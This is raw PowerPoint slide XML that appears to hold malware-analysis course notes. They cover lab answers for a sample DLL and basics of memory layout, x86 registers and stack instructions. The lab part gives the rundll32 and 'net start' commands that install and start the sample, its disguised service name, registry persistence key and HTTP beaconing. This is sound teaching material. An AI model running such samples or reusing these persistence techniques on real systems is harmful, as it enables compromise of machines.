                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>rundll32.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>rundll32.exe Lab03-02.dll,installA</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.</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2. To run the malware, start the service it installs using the net command</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net start IPRIP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.</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3. Use Process Explorer to determine which process is running the service.</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Since the malware will be running within one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>svchost.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>files on</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the system, hover over each one until you see the service name, or search</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for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab03-02.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>using the Find DLL feature of Process Explorer.</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3</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486 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Appendix C</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4. In procmon you can filter on the PID you found using Process Explorer.</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5. By default, the malware installs as the service IPRIP with a display name of</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Intranet Network Awareness (INA+) and description of “Depends INA+, Collects</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and stores network configuration and location information, and</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notifies applications when this information changes.” It installs itself for</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persistence in the registry at HKLM\SYSTEM\CurrentControlSet\Services\IPRIP\</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Parameters\ServiceDll: %CurrentDirectory%\Lab03-02.dll. If you rename</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab03-02.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>to something else, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>malware.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, then it writes </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>malware.dll</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into the registry key, instead of using the name </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab03-02.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.</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6. The malware resolves the domain name </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>practicalmalwareanalysis.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>and</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connects to that host over port 80 using what appears to be HTTP. It</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does a GET request for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>serve.html </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>and uses the User-Agent %ComputerName%</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Windows XP 6.11.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="812"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A229FE53-B086-45E2-AACA-2AA724C13200}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814"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815"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C819FB85-865E-4923-B8BC-3A4D4E0C7CBE}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817"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818"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399E620B-E049-4976-A830-264AE4278736}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757"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758"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C1F9FC45-4149-414C-BA47-021C6C240F51}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="820" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>This term can be used to refer to a specific section of memory called the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>data section</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, which contains values that are put in place when a program is initially loaded. These values are sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>static </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>values because they may not change while the program is running, or they may be called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>global </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>values because they are available to any part of the program.</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Code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Code includes the instructions fetched by the CPU to execute the program’s tasks. The code controls what the program does and how the program’s tasks will be orchestrated.</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Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>The heap is used for dynamic memory during program execution, to create (allocate) new values and eliminate (free) values that the program</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no longer needs. The heap is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>dynamic memory </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>because its contents can change frequently while the program is running.</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Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>The stack is used for local variables and parameters for functions, and to help control program flow. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821"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BA8B1D12-796B-44A3-B398-2C1F54B8ACC2}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>. General registers </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>are used by the CPU during execution (AX: accumulator; DX: double word accumulator; CX: counter; BX: base register; SI-DI: source-destination index).</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Segment registers </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>are used to track sections of memory.</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Status flags </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>are used to make decisions.</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Instruction pointers </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>are used to keep track of the next instruction to execute.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="824"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E410A854-89D3-4809-A909-3FA06E48CC9C}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826"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827"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813AFA53-1ABD-4FA3-95BF-6357792E32BF}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829"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830"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552512EF-A3C4-49EB-B6F2-2CD966C8B214}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Enter: setup a new stack frame for a procedure</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Leave: used at the end of the procedure (just before the RET instruction) to release the stack frame (pop EBP off, set ESP = EBP).</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Ret: return the calling function (pop Return addr 🡪 EIP)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833"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527AC4B9-61A1-43FB-B4EC-9BEC9A176458}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="835"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836"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02B53E41-D87D-419B-9835-0A9111A3B837}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>argv stands for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ument </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ector</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argc for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ument </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ount</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, and</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envp for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ironment </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ointer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.</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839"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1BEB728D-4686-455C-AA7B-73A6DCBB2C3A}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
